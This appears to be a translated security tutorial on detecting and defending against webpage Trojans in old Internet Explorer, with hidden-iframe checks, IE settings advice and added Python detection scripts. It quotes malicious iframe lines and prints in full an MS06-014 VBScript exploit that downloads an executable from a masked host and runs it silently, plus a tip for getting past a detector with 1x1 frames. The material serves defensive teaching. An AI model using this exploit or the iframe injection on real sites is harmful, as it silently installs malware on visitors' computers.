By New4 [D.S.T]
Article 1: http://www.bkjia.com/Article/201201/117514.html
You can learn from this article:
1. How to identify whether a webpage has Trojans
2. How to correctly handle IE vulnerabilities in the system
II. Protection against webpage Trojan intrusion
When you see the title of this chapter, you may think: "What? Webpage Trojan intrusion! Who will protect us when we browse websites (surf the web)?" You don't have to worry: after reading this part of the document, you can basically explore the Internet boldly.
Here we use four methods: the first is identifying the use of hidden frames to call htm; the second is identifying the use of redirection to call arbitrary htm or js; the third is defending against web Trojans using only IE; and the fourth is IE vulnerability repair and comments. Let's go!
Using hidden frames to call htm
Linking to a webpage Trojan through a hidden frame means using HTML to create a box that is invisible to the naked eye and hiding the webpage Trojan's address in it, so that the attacker's malicious code (the code that exploits the vulnerability) runs in the background. Let's briefly analyze the common webpage Trojan code, which is easy to read in HTML: <iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe> is a box whose width and height are both 0, so of course you cannot see it. This lets a webpage containing malicious code (that is, a webpage Trojan) open hidden in the background, where it can plant a backdoor, take remote control, steal information, or destroy disk files...
We can use the webpage Trojan guard software for defense. For example, if the website we want to visit is http://www.darkteam.cn, enter its address in the software's page view option to view the site's home page (Figure 1). We can see that the page we are visiting is normal! Now let's see what the software reports for a page that is not normal (Figure 2). The prompt reads: "The webpage has invisible forms and Trojans. Be careful!" I don't need to tell you what to do next. Go kill the virus!
(The software's detection criterion is <iframe src=http:// width=0 height=0></iframe>; when a page matches it, the software reports that an invisible form exists. This is a software defect that can be regarded as a bug: changing the width and height, as in <iframe src=http://www.xxxx.com/muma.htm width=1 height=1></iframe>, makes the check fail (Figure 3). How dumb! You still have to rely on yourself at the crucial moment... As for the software's problems, I won't say much, because I didn't write it. Anyone who is able can report it to the author and ask him to update it, or write a program of their own. Here we will keep using this software and judge manually.)
We can determine that the keyword to look for in the code is "<iframe src=http://any address (or /any address) width=0 height=0></iframe>", with width = 0 to 10 and height = 0 to 10, and the code must sit between <iframe and </iframe>. The code can be seen at the bottom of the page under <webpage source code> in the software.
Figure 1: Checking the default homepage of the site
Figure 2: A page with malicious code
Figure 3: A mutated malicious code page easily avoids detection
Identifying htm and js called through redirection
This type of call is difficult to check, but it is still not used very often. In webpage Trojan guard, check whether the homepage contains this code: "<Script language=javascript src=http://any file.js or any file.js></script>" (Figure 4). This check is difficult, because a normal page calls JavaScript the same way. The malicious code is in the JS file rather than in the homepage, so we only need to download the JS file and check it (you can use download tools such as Thunder to batch-download the files for checking)... The malicious code in JS files has basically the same features as on the HTM homepage. The code looks like this: "document.write("<iframe src=http://any address (or /any address) width=0 height=0></iframe>");" with width = 0 to 10 and height = 0 to 10, and it must be between <iframe and </iframe>.
Figure 4: Normal JS call behavior
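The manual rule from the two sections above (an iframe whose width and height are both between 0 and 10, either in the page itself or written by document.write in a JS file) can be automated. The Python code below is an added example, not the webpage Trojan guard software or the author's code; the names scan_html and scan_js and the hosts in the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

MAX_DIM = 10  # the article's manual rule: width and height from 0 to 10

def _dim(value):
    """Pixel size as int; None if missing or not a plain number (e.g. '100%')."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tiny, self.ext_js, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            w, h = _dim(a.get("width")), _dim(a.get("height"))
            if w is not None and h is not None and max(w, h) <= MAX_DIM:
                self.tiny.append(a.get("src"))
        elif tag == "script" and a.get("src"):
            self.ext_js.append(a["src"])  # external JS: download it, then scan_js it

    def handle_data(self, data):
        self.text.append(data)  # inline script bodies arrive here as raw text

DOC_WRITE = re.compile(r"document\s*\.\s*write(?:ln)?\s*\(\s*([\"'])(.*?)\1", re.S | re.I)

def scan_js(js):
    """Sources of tiny iframes that the script emits through document.write."""
    found = []
    for m in DOC_WRITE.finditer(js):
        found += scan_html(m.group(2))["tiny_iframes"]
    return found

def scan_html(html):
    p = _Scanner()
    p.feed(html)
    p.close()
    return {"tiny_iframes": p.tiny, "external_scripts": p.ext_js,
            "written_by_js": scan_js("".join(p.text))}

# Constructed sample page; the hosts are placeholders.
SAMPLE = '''<iframe src=http://trojan.example/muma.htm width=0 height=0></iframe>
<iframe src = http://trojan.example/muma2.htm width = 1 height = 1> </iframe>
<iframe src="/news.htm" width="600" height="400"></iframe>
<script language=javascript src=http://cdn.example/a.js></script>
<script>document.write("<iframe src=http://trojan.example/x.htm width=5 height=5></iframe>");</script>'''
```

Calling scan_html(SAMPLE) flags the 0x0 and the 1x1 frame alike, lists the external script that still has to be downloaded and passed to scan_js, and reports the frame that the inline script writes.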
You can check whether a page contains this typical webpage Trojan code:
Malicious code of the MS06-014 webpage Trojan (there are many webpage Trojan codes, but they cannot work for IE6.0 or patched systems!):
<Html>
<Script language = "VBScript">
' This tag calls VBScript; disabling that scripting alone blocks many web Trojans!
On error resume next
Dl = "http: // www. *****. com/go.exe" ' address the Trojan is downloaded from
Set df = document. createElement ("object ")
Df. setAttribute "classid", "clsid: BD96C556-65A3-11D0-983A-00C04FC29E36"
Str = "Microsoft. XMLHTTP"
Set x = df. CreateObject (str ,"")
A1 = "Ado"
A2 = "db ."
A3 = "Str"
A4 = "eam"
Str1 = a1 & a2 & a3 & a4
Str5 = str1
Set S = df. createobject (str5 ,"")
S. type = 1
Str6 = "GET"
X. Open str6, dl, False
X. Send
Fname1 = "g0ld.com"
Set F = df. createobject ("Scripting. FileSystemObject ","")
Set tmp = F. GetSpecialFolder (2)
Fname1 = F. BuildPath (tmp, fname1)
S. open
S. write x. responseBody
S. savetofile fname1, 2
S. close
Set Q = df. createobject ("Shell. Application ","")
Q. ShellExecute fname1, "", "", "open", 0
</Script>
<Head>
<Title> Oh, my god! </Title> <!-- text shown in the title bar at the top -->
</Head> <body>
<Center> You DO it! </Center> <!-- text shown on the page -->
</Body>
From the code above, we can see that the webpage is basically a static HTML page, although an ASP webpage Trojan cannot be ruled out. The two methods introduced earlier defend against what is commonly referred to as planting a "Trojan" on a page, which many small-time hackers do frequently. But what about the malicious code that exploits the vulnerability itself? Are we helpless? Not at all. Now let's move on to defending against webpage Trojans!
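The listing above assembles one ActiveX name from the fragments a1 to a4, so searching the page source for the full name finds nothing. The Python code below is an added example, not part of the original article; its function names and the excerpt it runs on are constructed for illustration. It folds those simple string concatenations before checking which objects the script creates.

```python
import re

# ActiveX names and the class id that appear in the article's listing.
RISKY_PROGIDS = {"microsoft.xmlhttp", "adodb.stream",
                 "scripting.filesystemobject", "shell.application"}
LISTING_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"

ASSIGN = re.compile(r"^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$", re.I)
TERM = r'(?:"[^"]*"|\w+)'
CONCAT = re.compile(rf"{TERM}(?:\s*&\s*{TERM})*")
PIECE = re.compile(r'"([^"]*)"|(\w+)')
CALL = re.compile(r'createobject\s*\(\s*("[^"]*"|\w+)', re.I)

def fold_strings(vbs):
    """Resolve assignments built only from string literals, variables and '&'."""
    env = {}
    for line in vbs.splitlines():
        m = ASSIGN.match(line)
        if not m or not CONCAT.fullmatch(m.group(2)):
            continue  # method calls and other expressions are ignored
        parts = [p.group(1) if p.group(1) is not None else env.get(p.group(2).lower())
                 for p in PIECE.finditer(m.group(2))]
        if None not in parts:
            env[m.group(1).lower()] = "".join(parts)
    return env

def find_indicators(vbs):
    """Risky ProgIDs passed to CreateObject, after folding, plus the class id."""
    env = fold_strings(vbs)  # final value of each variable (not flow-sensitive)
    hits = {"clsid:" + LISTING_CLSID} if LISTING_CLSID in vbs.lower() else set()
    for arg in CALL.findall(vbs):
        value = arg[1:-1] if arg.startswith('"') else env.get(arg.lower(), "")
        value = re.sub(r"\s+", "", value).lower()  # tolerate stray spaces
        if value in RISKY_PROGIDS:
            hits.add(value)
    return sorted(hits)

# Constructed excerpt: only the string-building lines of the listing, spacing normalised.
SAMPLE = '''df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
a1 = "Ado"
a2 = "db."
a3 = "Str"
a4 = "eam"
str1 = a1 & a2 & a3 & a4
str5 = str1
Set S = df.createobject(str5, "")
Set F = df.createobject("Scripting.FileSystemObject", "")'''
```

find_indicators(SAMPLE) reports the class id and the three created objects, including the stream object whose name never appears whole in the source.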
Defending against web Trojans using only IE
Here we introduce the method for IE6.0, a common browser:
Disable scripts: open IE's Internet Options > Security > Custom Level, go to Scripting > Java applet, and disable it (Figure 5).
Figure 5: Modifying IE to disable JavaScript scripts
Of course, you can also disable VBScript: select Disable for it in the scripting items. Click [Reset] for the change to take effect, then click OK to exit. You can also simply set the security level to High (Figure 5). Note: disabling scripts causes a lot of unexpected trouble, because most websites use them; beautification and animation effects need scripts to work.
Disable hidden frame (iframe) file calls: the method is basically the same as disabling scripts above (Figure 6). Of course, you can also set the security level to High (Figure 5).
Figure 6: Select Disable
Fixing IE vulnerabilities, and some comments
Disabling scripts leads to abnormal browsing or many abnormal problems on pages, so it is not recommended! Microsoft releases patches for the IE vulnerabilities that web Trojans exploit; we only need to install all the patches to reduce the chance of getting hit! Of course, you can also use browsers that are not built on the IE kernel, such as Mozilla Firefox (Figure 7) and the Opera browser (Figure 8). No matter which browser you use, update the software promptly and install patches for software defects!
Figure 7: Firefox
Figure 8: Opera browser
Summary: although there are a lot of web Trojans, with a few methods we can still greatly reduce the chance of getting hit! (Tools: webpage Trojan guard can be found at http://www.bkjia.com/soft)